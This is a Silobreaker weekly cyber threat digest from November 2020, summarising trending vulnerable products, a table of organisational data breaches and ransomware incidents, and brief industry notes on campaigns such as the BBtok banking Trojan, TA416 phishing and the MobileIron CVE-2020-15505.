26 November 2020

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

Trending Vulnerable Products

Open Source
Name Heat 7
Tesla Model X
Facebook Messenger
Deep & Dark Web
Name Heat 7
Microsoft SMBv3
Tesla Model X
Facebook Messenger

The tables show the products which have been mentioned more than usual during the last week in connection with vulnerabilities.

Data Leaks & Breaches

Leaks & Breaches
Company Information Affected
Seeley Medical (US) The Ohio-based medical clinic reported a data breach in which an attacker accessed and stole certain files. This may have included patient names, addresses, phone numbers, medical record numbers, Social Security numbers and prescription information. 16,196
Kenneth Copeland Ministries (US) On November 18th, 2020, REvil ransomware operators claimed an attack against Kenneth Copeland Ministries, purportedly stealing 1.2TB of data. A screenshot of an allegedly stolen file directory uploaded on the dark web suggests that financial documents, contracts, bank documents, sales history, and emails have been compromised. Unknown
Nitro Software (US) New Zealand’s Computer Emergency Response Team warned individuals that a threat actor is claiming to be in possession of 2.6 million Nitro PDF users’ email addresses and hashed passwords. Unknown
Pray Inc (US) Researchers at vpnMentor discovered four misconfigured AWS S3 buckets belonging to the Christian prayer app Pray[.]com. The exposed data dated from 2016 to present. Exposed user data included users’ full names, phone numbers, home addresses, email addresses, photos uploaded by users, and more. The app also stored data taken from its users’ contacts, exposing names, phone numbers, email addresses, and more, of individuals not using the app. 10,000,000
LSU Health New Orleans Health Care Services Division  (US) An employee’s compromised email account reportedly contained emails and attachments with limited information about patients who received care at a number of facilities. Potentially exposed data includes patient names, medical record numbers, account numbers, dates of birth, Social Security numbers, and more. Unknown
Miltenyi Biotec (US) On November 4th, 2020, Mount Locker ransomware operators claimed responsibility for an attack against the company and leaked 5% of 150GB of data supposedly stolen from the company on their data leak site. Unknown
Glofox (Ireland) The Irish Times reports that gym management software company Glofox has informed several gyms of a possible data breach exposing customer data. The attack, reportedly carried out by ShinyHunters, may have exposed the names, addresses, phone numbers, hashed passwords, and dates of birth for an unspecified number of customers. Unknown
Spotify (Sweden) Researchers at vpnMentor identified an unsecured Elasticsearch database containing over 380 million records. The researchers speculated that the data, which included login credentials, was being used to try and access Spotify accounts.  Unknown
Corcoran Group (US) In June 2020, security researcher Jeremiah Fowler discovered an unprotected and publicly accessible database exposing a total of 30.7 million records. Exposed data included agent names, emails, passwords keys, security tokens, and other internal records, as well as owner and client data such as names, emails and property data. Unknown
Law In Order (Australia) Law In Order was targeted in a NetWalker ransomware attack discovered on November 22nd, 2020. According to the company, there have been reports of a ‘very small proportion’ of data exfiltrated from its servers. Unknown
Banijay Group (France) The entertainment company was targeted in a ransomware attack. According to Cybersecurity Insiders and Deadline, the attackers may have exfiltrated employee data, including ID information, bank details, and home addresses. Unknown
Peatix Inc (US) A hacker leaked the data of over 4.2 million users via ads posted on Instagram stories, Telegram channels and several hacking forums. Samples analysed by ZDNet included full names, usernames, email addresses, and salted and hashed passwords. 4,200,000
Galstan & Ward Family and Cosmetic Dentistry (US) The practice reported that one of their servers was compromised by an intruder who contacted them over the phone to demand a ransom. On September 11th, 2020, some files were published on the dark web. Names, addresses, birth dates, Social Security numbers, and dental files may have been viewed by the attackers. Unknown
Baidu (China) Researchers at Palo Alto Networks Unit 42 identified that Baidu Search Box and Baidu Map collected information such as IMSI and MAC addresses. This information could allow a user to be tracked over their lifetime. Unknown
Conway Regional Medical Center (US) The Arkansas medical center identified unauthorised access to an employee email on October 12th, 2020. The breach exposed patient names, birth dates, email addresses, and the Covid-19 test results. 2,945
WhiteHat Jr (India) According to The Quint, the company maintained an unsecured AWS S3 bucket which exposed student data. Exposed data included student names, ages, genders, pictures, user IDs, parent names, and progress reports. Another researcher, Santosh Patidar, additionally identified an exposed API belonging to the company, which leaked personal data such as transaction information. 280,000
Headlam Group (US) On November 24th, 2020, the floorcoverings distributor disclosed that it had discovered unauthorised access to some of its computer systems. Evidence of a small amount of data having been exfiltrated was found. 92,795
Fairchild Medical Center (US) In July 2020, Fairchild Medical Center was informed of a misconfiguration of one of its servers, resulting in the exposure of records. The server was accessible from December 16th, 2015 to July 31st, 2020. An investigation into the breach could not determine whether unauthorised access to its records had taken place. Potentially accessed data includes medical images, names, dates of birth, patient identification numbers and more. Unknown
Bristol City Council (UK) The council accidentally sent an email regarding a new support service to hundreds of individuals that included the names of 487 children and email addresses of their primary carers. 487
NHS Highland (UK) NHS Highland accidentally forwarded a list of 284 diabetic patients to 31 unnamed individuals. The accident exposed the patients’ names, dates of birth, contact information and hospital identification numbers. 284

Attack Type mentions in Government

Time Series

This chart shows the trending Attack Types related to Government over the last week.

Weekly Industry View

Industry View
Industry Information
Banking & Finance Researchers at 360 Total Security discovered a banking Trojan named BBtok that is active in Mexico. The malware is delivered via LNK attachments disguised as PDFs in phishing emails. The malware executes a file-less attack deploying a PowerShell script to download and run the payload. It is capable of bypassing antivirus detection and executing various backdoor instructions, including manipulating Windows processes and services. BBtok can also be used to display fake banking security verification windows which mimic the appearance of legitimate banking interfaces, in an attempt to steal user credentials. 
Government From September to October 2020, Proofpoint researchers observed new phishing activity by TA416 that appears to be a continuation of past campaigns targeting entities associated with diplomatic relations between the Vatican and the Chinese Communist Party and entities in Myanmar. Targeting of organisations in Africa was also observed. Similar past campaigns by the group have been attributed to Mustang Panda and RedDelta. The renewed activity consisted of social engineering lures referencing a provisional agreement between the Vatican Holy See and the Chinese Communist Party and imitated journalists from the Union of Catholics Asia News. The campaign involved a new Golang version of PlugX. The researchers note that this is the first time TA416 has been observed using a Golang binary. 
Technology The UK’s National Cyber Security Centre warned that cybercriminals and nation-state APT groups are attempting to compromise the network of UK organisations by targeting a vulnerability in MobileIron Core and Connector products. The critical remote code execution flaw is tracked as CVE-2020-15505 and was patched by MobileIron in June 2020. In September 2020, a proof-of-concept exploit became available and threat actors began to target vulnerable networks, in some cases successfully. Targeted sectors include healthcare, legal, local government, and logistics. 
Retail & Hospitality Gemini Advisory researchers reported that US and European banks are experiencing a spike in e-commerce fraud linked to China-based sites registered to the Chinese Registrar ename[.]net in the lead up to Black Friday. The researchers identified one group operating nearly 600 scam sites, 200 of which are linked to Jilin Jiutai Rural Commercial Bank Co Ltd. The nature of the relationship between the bank and the fraudsters is not known at present. The fraud group sets up legitimate-looking online shops that collect customers’ payment card data and personally identifiable information, which is then sold on dark web marketplaces. Corresponding social media sites are also created to make the business appear more legitimate and further advertise their products. 
Cryptocurrency   Threat actors targeted employees at GoDaddy with social engineering scams to convince them to transfer ownership and control over certain domains to themselves. The attacks resulted in breaches at a number of cryptocurrency trading platforms, including Liquid, NiceHash, and potentially Bibox[.]com, Celsius[.]network and Wirex[.]app. 

News and information concerning each mentioned industry over the last week.

Silobreaker’s Weekly Cyber Digest is a quantitative summary of our threat reports, published every Thursday. The reports are created using our award-winning intelligence product Silobreaker Online.

This website uses cookies.
See our privacy policy at www.silobreaker.com/legal